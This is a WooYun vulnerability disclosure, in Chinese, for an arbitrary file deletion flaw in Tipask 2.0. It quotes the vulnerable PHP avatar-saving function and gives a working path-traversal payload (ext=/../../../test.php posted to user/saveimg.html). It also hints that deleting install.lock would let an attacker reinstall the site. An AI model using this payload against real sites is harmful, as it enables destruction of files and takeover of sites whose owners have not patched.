当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026781

漏洞标题:Tipask 2.0 前台任意文件删除漏洞

相关厂商:Tipask

漏洞作者: 猪头子

提交时间:2013-06-24 16:31

修复时间:2013-09-22 16:32

公开时间:2013-09-22 16:32

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

* tipask可以调整头像保存并删除原始头像
* 在删除原始头像时使用了post提交的参数
* 造成任意文件删除漏洞

详细说明:

function onsaveimg() {
$x1 = $this-> post['x1' ];
$y1 = $this-> post['y1' ];
$x2 = $this-> post['x2' ];
$y2 = $this-> post['y2' ];
$w = $this-> post['w' ];
$h = $this-> post['h' ];
$ext = $this-> post['ext' ];
$upload_tmp_file = TIPASK_ROOT . "/data/tmp/" . 'bigavatar' . $this->user['uid' ] . $ext;
$avatardir = "/data/avatar/"; //图片存放目录
$scale = 100 / $w;
resizeThumbnailImage( $smallimg, $upload_tmp_file, $w, $h, $x1, $y1, $scale);
copy($upload_tmp_file, TIPASK_ROOT . $dir3 . '/big_' . $uid . $ext);
is_file($upload_tmp_file) && unlink($upload_tmp_file);
$_ENV[ 'user']->update_avatar($smallimg);
$this->message( '头像设置成功!' , 'user/editimg' );
}


可以看到onsaveimg函数直接调用post的ext参数并传入到$upload_tmp_file中,最后进入unlink。造成任意文件删除漏洞。

漏洞证明:

删除根目录下的test.php
post ext=/../../../test.php 到?user/saveimg.html
其实可以删除install.lock你们懂的

修复方案:

坐等忽略

版权声明:转载请注明来源 猪头子@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝